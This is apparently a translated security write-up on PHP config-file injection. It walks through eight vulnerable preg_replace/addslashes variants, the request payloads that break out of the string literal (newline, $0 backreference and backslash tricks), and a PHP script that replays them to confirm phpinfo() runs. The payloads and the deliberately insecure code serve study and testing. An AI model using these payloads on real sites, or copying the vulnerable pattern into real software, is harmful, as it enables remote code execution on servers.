Over the winter break I read P牛's 经典写配置漏洞与几种变形 (the classic config-writing vulnerability and several variants), but by the start of term I still hadn't worked through why each case behaves the way it does. Having come across it again recently, it's time to analyze it properly.
P牛's post breaks this class of bug into the following cases.
0x01 Greedy mode without s

test.php:

```php
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/\\\$API = '.*';/", "\$API = '{$api}';", $file);
file_put_contents('./option.php', $file);
```

option.php:

```php
<?php
highlight_file(__FILE__);
$API = 'test';
```

First request:

```
http://192.168.59.156/test.php?api=%27;%0aphpinfo();//
```

addslashes() turns the quote into `\'`, so after this request the line in option.php is `$API = '\';` followed by a newline and `phpinfo();//';`, which PHP still reads as one string literal. Because the original closing `';` is left behind after phpinfo();, it has to be commented out with `//`. Without the s modifier `.` does not match a newline, so on the second request the greedy `.*` can only run to the `';` on the first line, the one produced by the escaped quote:

```
http://192.168.59.156/test.php?api=aa
```

That rewrites only `$API = '\';` to `$API = 'aa';` and leaves `phpinfo();//';` on the next line as code, so phpinfo() now executes.
0x02 Greedy mode with s

test.php:

```php
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/\\\$API = '.*';/s", "\$API = '{$api}';", $file);
file_put_contents('./option.php', $file);
```

option.php:

```php
<?php
highlight_file(__FILE__);
$API = 'test';
```

With s, `.` matches newlines too, so the newline trick from 0x01 no longer works: on the second request the greedy `.*` would swallow the whole injected payload up to the last `';` and overwrite it. Instead, two requests:

```
http://192.168.59.156/test.php?api=;phpinfo();
```

```
http://192.168.59.156/test.php?api=$0
```

In the replacement string of preg_replace(), `$0` is the entire text the regex matched, and it passes through addslashes() untouched because it contains no quote or backslash. After the first request the file holds `$API = ';phpinfo();';`; the second request replaces that match with `$API = '$API = ';phpinfo();';';`, where the quote inside the re-inserted match closes the string exactly in time and phpinfo(); escapes out of it.
0x03 Non-greedy without s

test.php:

```php
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/\\\$API = '.*?';/", "\$API = '{$api}';", $file);
file_put_contents('./option.php', $file);
```

option.php:

```php
<?php
highlight_file(__FILE__);
$API = 'test';
```

The same two requests as in 0x01 work here: the lazy `.*?` stops at the first `';`, which is the one formed by the escaped quote, so the second request again rewrites only the first line.

```
http://192.168.59.156/test.php?api=%27;%0aphpinfo();//
```

```
http://192.168.59.156/test.php?api=aa
```
0x04 Non-greedy with s

test.php:

```php
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/\\\$API = '.*?';/s", "\$API = '{$api}';", $file);
file_put_contents('./option.php', $file);
```

option.php:

```php
<?php
highlight_file(__FILE__);
$API = 'aa';
```

The `$0` method from 0x02 works here as well:

```
http://192.168.59.156/test.php?api=;phpinfo();
```

```
http://192.168.59.156/test.php?api=$0
```

Alternatively, because the lazy `.*?` stops at the first `';` regardless of the s modifier, no newline is needed at all: after the first request the line is `$API = 'aaa\';phpinfo();//';`, and the second request matches only `$API = 'aaa\';`, leaving `phpinfo();//';` behind as code.

```
http://192.168.59.156/test.php?api=aaa%27;phpinfo();//
```

```
http://192.168.59.156/test.php?api=aaa
```
0x05 define, greedy without s

test.php:

```php
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/define\('API', '.*'\);/", "define('API', '{$api}');", $file);
file_put_contents('./option.php', $file);
```

option.php:

```php
<?php
highlight_file(__FILE__);
define('API', 'aaa');
```

Same idea as 0x01, except that the payload has to close `');` instead of `';`. The first request leaves `define('API', '\');` on one line and `phpinfo();//');` on the next; the second request rewrites only the first line.

```
http://192.168.59.156/test.php?api=%27);%0aphpinfo();//
```

```
http://192.168.59.156/test.php?api=aa
```
0x06 define, greedy with s

test.php:

```php
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/define\('API', '.*'\);/s", "define('API', '{$api}');", $file);
file_put_contents('./option.php', $file);
```

option.php:

```php
<?php
highlight_file(__FILE__);
define('API', 'aaa');
```

```
http://127.0.0.1/t.php?api=1\%27);phpinfo();%23
```

The raw value is `1\');phpinfo();#`. addslashes() doubles the backslash and escapes the quote, giving `1\\\');phpinfo();#`. preg_replace() treats `\\` in its replacement string as an escaped backslash and collapses it to a single `\`, so what actually lands in the file is `define('API', '1\\');phpinfo();#');`. PHP reads `\\` there as an escaped backslash, and the quote that follows closes the string, so phpinfo(); runs and `#` comments out the rest. Because preg_replace() eats one of the escape characters added by addslashes(), a bare single quote gets through in a single request, and this method works against every variant in this post.
0x07 define, non-greedy without s

test.php:

```php
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/define\('API', '.*?'\);/", "define('API', '{$api}');", $file);
file_put_contents('./option.php', $file);
```

option.php:

```php
<?php
highlight_file(__FILE__);
define('API', 'aaa');
```

The backslash trick from 0x06 works in one request:

```
http://127.0.0.1/t.php?api=1\%27);phpinfo();%23
```

Or, as with the other non-greedy cases, two requests: the lazy `.*?` stops at the escaped quote's `');`, so no newline is needed.

```
http://192.168.59.156/test.php?api=%27);phpinfo();//
```

```
http://192.168.59.156/test.php?api=aa
```
0x08 define, non-greedy with s

test.php:

```php
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/define\('API', '.*?'\);/s", "define('API', '{$api}');", $file);
file_put_contents('./option.php', $file);
```

option.php:

```php
<?php
highlight_file(__FILE__);
define('API', 'aaa');
```

The s modifier makes no difference to the lazy match, so the same two requests as in 0x07 work:

```
http://192.168.59.156/test.php?api=%27);phpinfo();//
```

```
http://192.168.59.156/test.php?api=aa
```
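To check all of the above without a web server or any file writes, here is an added example (my own code, not from the original post or from P牛's article) that replays the eight variants from 0x01 to 0x08 in memory. Each simulated request does what test.php does, minus the file I/O, and the rewritten config is tokenized to see whether phpinfo() ended up as code or is still inside the string literal. The helper names (rewrite, code_injected, run_case), the PATTERNS table and the sample config strings are my own; it needs PHP 7.1 or later.

```php
<?php
// Added example, not code from the original post or from P牛's article: an
// in-memory replay of the eight config-rewriting variants (0x01 to 0x08).
// A "request" does exactly what test.php does, minus the file I/O, and the
// rewritten option.php is tokenized to see whether phpinfo() became code or
// is still inside the string literal. The helper names (rewrite, code_injected,
// run_case) and the PATTERNS table are my own. Needs PHP 7.1 or later.

// Regex and replacement template for each variant, copied from the page;
// %s stands for {$api} in the page's replacement string.
const PATTERNS = [
    '0x01 $API greedy'          => ["/\\\$API = '.*';/",          "\$API = '%s';"],
    '0x02 $API greedy /s'       => ["/\\\$API = '.*';/s",         "\$API = '%s';"],
    '0x03 $API non-greedy'      => ["/\\\$API = '.*?';/",         "\$API = '%s';"],
    '0x04 $API non-greedy /s'   => ["/\\\$API = '.*?';/s",        "\$API = '%s';"],
    '0x05 define greedy'        => ["/define\('API', '.*'\);/",   "define('API', '%s');"],
    '0x06 define greedy /s'     => ["/define\('API', '.*'\);/s",  "define('API', '%s');"],
    '0x07 define non-greedy'    => ["/define\('API', '.*?'\);/",  "define('API', '%s');"],
    '0x08 define non-greedy /s' => ["/define\('API', '.*?'\);/s", "define('API', '%s');"],
];
// Constructed copies of the two option.php files shown on the page.
const API_FILE    = "<?php\nhighlight_file(__FILE__);\n\$API = 'test';\n";
const DEFINE_FILE = "<?php\nhighlight_file(__FILE__);\ndefine('API', 'aaa');\n";

// One request to test.php: addslashes() the parameter, then preg_replace()
// it into the config. The template is passed to preg_replace() unchanged, so
// a $0 in the parameter is still interpreted as a backreference.
function rewrite(string $option, string $pattern, string $template, string $rawApi): string
{
    $api = addslashes($rawApi);
    return preg_replace($pattern, sprintf($template, $api), $option);
}

// Tokenize the rewritten file and look for phpinfo as a bare identifier
// (T_STRING). Inside a string literal it would be part of a
// T_CONSTANT_ENCAPSED_STRING token instead.
function code_injected(string $src): bool
{
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok) && $tok[0] === T_STRING && $tok[1] === 'phpinfo') {
            return true;
        }
    }
    return false;
}

// Replay a sequence of requests against a fresh config; returns true when
// the final file would execute phpinfo().
function run_case(string $variant, string $original, array $requests): bool
{
    [$pattern, $template] = PATTERNS[$variant];
    $option = $original;
    foreach ($requests as $rawApi) {
        $option = rewrite($option, $pattern, $template, $rawApi);
    }
    $ok = code_injected($option);
    printf("%-26s %s\n%s\n", $variant, $ok ? 'phpinfo() runs' : 'still a string', $option);
    return $ok;
}

// Newline trick from 0x01: works without /s, fails with /s because .* then
// swallows the newline and the second request overwrites the whole payload.
run_case('0x01 $API greedy',    API_FILE, ["';\nphpinfo();//", 'aa']);
run_case('0x02 $API greedy /s', API_FILE, ["';\nphpinfo();//", 'aa']);

// $0 trick from 0x02: the second request re-inserts the whole first match.
run_case('0x02 $API greedy /s', API_FILE, [';phpinfo();', '$0']);

// Non-greedy (0x04): .*? stops at the first '; so no newline is needed.
run_case('0x04 $API non-greedy /s', API_FILE, ["aaa';phpinfo();//", 'aaa']);

// Backslash trick from 0x06, one request: addslashes() turns 1\' into 1\\\'
// and preg_replace() collapses the \\ in its replacement back to \, so the
// file receives 1\\' where the quote is no longer escaped.
$raw = '1\\\';phpinfo();#';                      // raw GET value: 1\';phpinfo();#
printf("raw: %s\naddslashes: %s\npreg_replace: %s\n\n",
       $raw, addslashes($raw), preg_replace('/x/', addslashes($raw), 'x'));
foreach (array_keys(PATTERNS) as $variant) {
    $isDefine = strpos($variant, 'define') !== false;
    run_case($variant,
             $isDefine ? DEFINE_FILE : API_FILE,
             [$isDefine ? '1\\\');phpinfo();#' : $raw]);   // close '); for define, '; for $API
}
```

Run it with `php replay.php` (any file name will do). The first four runs show the newline trick succeeding against 0x01 and failing against 0x02, then `$0` and the lazy-match payload succeeding; the final loop shows the backslash payload landing as code in all eight variants from a single request, which is the "works everywhere" claim made in 0x06.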
Reference:
经典写配置漏洞与几种变形 (P牛)